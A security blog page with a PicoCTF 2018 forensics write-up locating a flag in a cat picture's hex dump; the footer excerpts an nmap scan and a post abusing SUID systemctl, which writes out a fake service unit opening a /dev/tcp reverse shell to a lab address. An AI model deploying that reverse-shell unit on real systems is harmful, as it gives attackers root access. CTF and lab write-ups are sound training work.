Skip to main content

PicoCTF2018 - Forensics - hex editor

PicoCTF2018 - Forensics - hex editor

Objective:

This cat [1]  has a secret to teach you. You can also find the file in /problems/hex-editor_3_086632ac634f394afd301fb6a8dbadc6 on the shell server.


Solution:

so from the objective it looks like our flag will be in the hex of the picutre.

I downloaded the picture and openend it with hexeditor

@kali:/home$ hexeditor /home/***********/Downloads/hex_editor.jpg

Since we now the flag starts with I used W to search for pico, I chose search for text string


File: /home/*****************/Dow   ASCII Offset: 0x00000000 / 0x00012975 () 
00000000  FF D8 FF E0  00 10 4A 46   49 46 00 01  01 00 00 01   ......JFIF......
00000010  00 01 00 00  FF DB 00 43   00 05 03 04  04 04 03 05   .......C........
00000020  04 04 04 05  05 05 06 07   0C 08 07 07  07 07 0F 0B   ................
00000030  0B 09 0C 11  0F 12 12 11   0F 11 11 13  16 1C 17 13   ................
00000040  14 1A 15 11  11 18 21 18   1A 1D 1D 1F  1F 1F 13 17   ......!.........
00000050  22 24 22 1E  24 1C 1E 1F   1E FF DB 00  43 01 05 05   "$".$.......C...
00000060  05 07 06 07  0E 08 08 0E   1E 14 11 14  1E 1E 1E 1E   ................
00000070  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E 1E 1E   ................
00000080  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E 1E 1E   ................
00000090  1E 1E 1E 1E  1E 1E 1E 1E   1E 1E 1E 1E  1E 1E FF C0   ................
000000A0  00 11 08 04  00 02 77 03   01 22 00 02  11 01 03 11   ......w.."......
000000B0  01 FF C4 00  1F 00 00 01   05 01 01 01  01 01 01 00   ................
000000C0  00 00 00 00  00 00 00 01   02 03 04 05  06 07 08 09   ................
000000D0  0A 0B FF C4  00 B5 10 00   02 01 03 03  02 04 03 05   ................
000000E0  05 04 04 00  00 01 7D 01   02 03 00 04  11 05 12 21   ......}........!
000000F0  31 41 06 13  51 61 07 22   71 14 32 81  91 A1 08 23   1A..Qa."q.2....#
00000100  42 B1 C1 15  52 D1 F0 24   33 62 72 82  09 0A 16 17   B...R..$3br.....
00000110  18 19 1A 25  26 27 28 29   2A 34 35 36  37 38 39 3A   ...%&'()*456789:
00000120  43 44 45 46  47 48 49 4A   53 54 55 56  57 58 59 5A   CDEFGHIJSTUVWXYZ
00000130  63 64 65 66  67 68 69 6A   73 74 75 76  77 78 79 7A   cdefghijstuvwxyz
00000140  83 84 85 86  87 88 89 8A   92 93 94 95  96 97 98 99   ................
00000150  9A A2 A3 A4  A5 A6 A7 A8   A9 AA B2 B3  B4 B5 B6 B7   ................
^G Help   ^C Exit (No Save)   ^T goTo Offset   ^X Exit and Save   ^W Search
00012940  3A 20 22 70  69 63 6F 43   54 46 7B 61  6E 64 5F 74   : "picoCTF{and_t
00012950  68 61 74 73  5F 68 6F 77   5F 75 5F 65  64 69 74 5F   hats_how_u_edit_
00012960  68 65 78 5F  6B 69 74 74   6F 73 5F 38  42 63 41 36   hex_kittos_8BcA6
00012970  37 61 32 7D  22 0A                                    7a2}".






picoCTF{and_thats_how_u_edit_hex_kittos_8BcA67a2}
Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more